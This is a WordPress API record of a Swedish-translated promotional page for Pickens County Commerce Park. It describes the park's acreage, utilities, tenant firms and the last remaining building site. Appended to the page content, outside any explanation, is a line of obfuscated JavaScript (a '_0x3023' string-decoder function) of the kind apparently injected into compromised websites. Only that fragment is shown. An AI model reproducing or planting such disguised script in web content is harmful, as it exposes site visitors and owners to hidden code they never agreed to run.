{"id":11601,"date":"2020-12-04T17:42:22","date_gmt":"2020-12-04T17:42:22","guid":{"rendered":"http:\/\/alliancepickens.com\/webbplatser-byggnader\/pickens-county-commerce-park\/"},"modified":"2020-12-09T20:36:47","modified_gmt":"2020-12-09T20:36:47","slug":"pickens-county-commerce-park","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/pickens-county-commerce-park\/","title":{"rendered":"Pickens County Commerce Park"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;9817&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][vc_column_text]Pickens County Commerce Park \u00e4r en 310 hektar stor klass A Industrial Park med 6000 meter av fr\u00e4msta frontage p\u00e5 fyrfilig US Highway 123. Den Pickens County Commerce Park har en komplett nytta infrastruktur som omfattar 2 elleverant\u00f6rer, en dedikerad fiber switch, gott om avloppsvatten kapacitet, vattenkapacitet och en 1 miljon liter vatten lagringstank som \u00e4r avsedd f\u00f6r anv\u00e4ndning av Commerce Park anl\u00e4ggningar.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_video link=&#8221;https:\/\/youtu.be\/P9cls2EmFko&#8221;][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/2&#8243;][vc_video link=&#8221;https:\/\/youtu.be\/r9VClCbSsmo&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_video link=&#8221;https:\/\/youtu.be\/wZQoJ4p6FMo&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;5565&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_column_text]<\/p>\n<h3><\/h3>\n<h3 style=\"text-align: center\">F\u00f6retag i Pickens County Commerce Park Inkluderar:<\/h3>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Abbott<\/li>\n<li>era-kontakta USA<\/li>\n<li>IPSUM-tekniker<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Teknik f\u00f6r JR-automatisering<\/li>\n<li>KeyMark, Inc.<\/li>\n<li>P\u00e5litlig Automatisk Sprinkler Company<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Safeplast USA<\/li>\n<li>Taylormade<\/li>\n<li>United Verktyg och m\u00f6gel<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][\/vc_row_inner][vc_column_text]<\/p>\n<h3 style=\"text-align: center\"><\/h3>\n<h3 style=\"text-align: center\">Pickens County Commerce Park funktioner inkluderar:<\/h3>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Klass A Industripark<\/li>\n<li>Skyddsf\u00f6rbund p\u00e5 plats | <a href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/PCCP-Protective-Covenenants-1.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">L\u00e4s mer<\/a><\/li>\n<li>Tv\u00e5 elektriska transformatorstationer och tv\u00e5 elleverant\u00f6rer<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Digital fiber switch p\u00e5 lokaler<\/li>\n<li>Robust infrastruktur p\u00e5 plats<\/li>\n<li>\u00d6ver 1,1 miljoner kvadratmeter byggnadskonstruktion<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Campus-liknande milj\u00f6<\/li>\n<li>Mellan Charlotte, NC och Atlanta, GA<\/li>\n<li>En plats som \u00e5terst\u00e5r<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][\/vc_row_inner][vc_column_text el_class=&#8221;fullbtn&#8221;]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/pickens-county-commerce-park\/\">L\u00e4s mer om Pickens County Commerce Park<\/a>[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_empty_space][vc_column_text]Om ditt f\u00f6retag \u00e4r intressera av att l\u00e4ra sig mer om den senast tillg\u00e4ngliga industriplatsen i Pickens County Commerce Park, <a href=\"http:\/\/alliancepickens.com\/sv\/om-oss\/#contact\">v\u00e4nligen kontakta <\/a>Alliance Pickens. <a href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/PCCP-Protective-Covenenants.pdf\">Visa de skyddande f\u00f6rbunden f\u00f6r Pickens County Commerce Park<\/a>[\/vc_column_text][vc_empty_space][vc_single_image image=&#8221;10662&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/PCCP-1.pdf&#8221;][vc_empty_space][vc_column_text]<span style=\"font-weight: 400\">Plats A \u00e4r den sista platsen i Pickens County Commerce Park. Tjugo (20) bordsskiva tunnland utsikt \u00f6ver Blue Ridge Mountains. Dr\u00f6narbilderna visar renderingar f\u00f6r en (1) och tv\u00e5 (2) byggnadslayouter. Dessa renderingar f\u00f6ljer de mest grundl\u00e4ggande  <\/span><span style=\"font-weight: 400\">standarder som fastst\u00e4llts i Pickens County <\/span> <span style=\"font-weight: 400\">Commerce Park Protective Covenants.<\/span>[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;10665&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">L\u00e4s mer om webbplatser och byggnader<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;19&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Redo att s\u00e4tta ig\u00e5ng?<\/h1>\n<h3>Vi ser fram emot att f\u00e5 tala med er!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Kontakta v\u00e5rt team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;9817&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][vc_column_text]Pickens County Commerce Park \u00e4r en 310 hektar stor klass A Industrial Park med 6000 meter av fr\u00e4msta frontage p\u00e5 fyrfilig US Highway 123. Den Pickens County Commerce Park har en komplett nytta infrastruktur som omfattar 2 elleverant\u00f6rer, en dedikerad fiber switch, gott om avloppsvatten kapacitet, vattenkapacitet och en 1&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":8670,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-11601","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Pickens County Commerce Park - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/pickens-county-commerce-park\/\" \/>\n<meta property=\"og:locale\" content=\"sv_SE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pickens County Commerce Park - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;9817&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][vc_column_text]Pickens County Commerce Park \u00e4r en 310 hektar stor klass A Industrial Park med 6000 meter av fr\u00e4msta frontage p\u00e5 fyrfilig US Highway 123. Den Pickens County Commerce Park har en komplett nytta infrastruktur som omfattar 2 elleverant\u00f6rer, en dedikerad fiber switch, gott om avloppsvatten kapacitet, vattenkapacitet och en 1&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/pickens-county-commerce-park\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-09T20:36:47+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/webbplatser-byggnader\\\/pickens-county-commerce-park\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/webbplatser-byggnader\\\/pickens-county-commerce-park\\\/\",\"name\":\"Pickens County Commerce Park - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\"},\"datePublished\":\"2020-12-04T17:42:22+00:00\",\"dateModified\":\"2020-12-09T20:36:47+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/webbplatser-byggnader\\\/pickens-county-commerce-park\\\/#breadcrumb\"},\"inLanguage\":\"sv-SE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/webbplatser-byggnader\\\/pickens-county-commerce-park\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/webbplatser-byggnader\\\/pickens-county-commerce-park\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Webbplatser &amp; Byggnader\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/webbplatser-byggnader\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Pickens County Commerce Park\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sv-SE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pickens County Commerce Park - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/pickens-county-commerce-park\/","og_locale":"sv_SE","og_type":"article","og_title":"Pickens County Commerce Park - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;9817&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][vc_column_text]Pickens County Commerce Park \u00e4r en 310 hektar stor klass A Industrial Park med 6000 meter av fr\u00e4msta frontage p\u00e5 fyrfilig US Highway 123. Den Pickens County Commerce Park har en komplett nytta infrastruktur som omfattar 2 elleverant\u00f6rer, en dedikerad fiber switch, gott om avloppsvatten kapacitet, vattenkapacitet och en 1&hellip;","og_url":"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/pickens-county-commerce-park\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-09T20:36:47+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/pickens-county-commerce-park\/","url":"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/pickens-county-commerce-park\/","name":"Pickens County Commerce Park - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/#website"},"datePublished":"2020-12-04T17:42:22+00:00","dateModified":"2020-12-09T20:36:47+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/pickens-county-commerce-park\/#breadcrumb"},"inLanguage":"sv-SE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/pickens-county-commerce-park\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/pickens-county-commerce-park\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/sv\/"},{"@type":"ListItem","position":2,"name":"Webbplatser &amp; Byggnader","item":"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/"},{"@type":"ListItem","position":3,"name":"Pickens County Commerce Park"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/sv\/#website","url":"https:\/\/alliancepickens.com\/sv\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/sv\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sv-SE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/11601","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/comments?post=11601"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/11601\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/8670"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media?parent=11601"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}